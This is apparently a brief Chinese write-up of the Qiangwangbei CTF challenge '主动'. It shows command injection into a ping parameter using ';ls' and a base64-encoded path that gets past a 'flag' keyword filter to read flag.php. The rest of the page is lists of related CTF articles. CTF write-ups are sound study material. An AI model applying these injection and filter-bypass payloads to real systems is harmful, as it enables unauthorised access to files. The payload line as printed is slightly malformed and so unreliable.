强网杯-主动
打开环境 看到ping -c 3,属于命令注入 尝试传递ip=127.0.0.1;ls 得到 显然if里面的内容过滤掉了flag,而我们需要读取flag.php内的内容 使用通配符 Base64编码绕过 ?id=1;cat echo 'Li9mbGFnLnBocAo=' | base64 -d: 用cat读取flag f12查看
相关文章
- 1. 强网杯
- 2. CTF-强网杯
- 3. 2019强网杯wp
- 4. 【强网杯2018】Gamebox
- 5. 2020第四届"强网杯"全国网络安全挑战赛-主动
- 6. 【第四届“强网杯”全国网络安全挑战赛】强网先锋 主动
- 7. 第二届强网杯wp
- 8. 第二届强网杯simplecheck
- 9. 强网杯2020部分WP
- 10. 【强网杯2018】逆向hide
- 更多相关文章...
- • 网站主机提供商 - 网站主机教程
- • 网站主机教程 - 网站主机教程
- • 算法总结-滑动窗口
- • 互联网组织的未来:剖析GitHub员工的任性之源
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 强网杯
- 2. CTF-强网杯
- 3. 2019强网杯wp
- 4. 【强网杯2018】Gamebox
- 5. 2020第四届"强网杯"全国网络安全挑战赛-主动
- 6. 【第四届“强网杯”全国网络安全挑战赛】强网先锋 主动
- 7. 第二届强网杯wp
- 8. 第二届强网杯simplecheck
- 9. 强网杯2020部分WP
- 10. 【强网杯2018】逆向hide